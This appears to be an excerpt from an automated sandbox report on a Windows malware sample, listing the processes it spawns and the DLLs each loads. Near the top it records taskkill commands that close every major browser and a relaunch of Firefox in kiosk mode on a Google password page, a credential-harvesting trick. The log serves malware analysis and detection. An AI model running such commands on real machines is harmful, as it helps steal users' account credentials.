Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -parentBuildID 20230927232528 -prefsHandle 4172 -prefMapHandle 4168 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e2b9126-91e2-41af-b164-fbbe6f838f36} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" 19e4cd8c210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
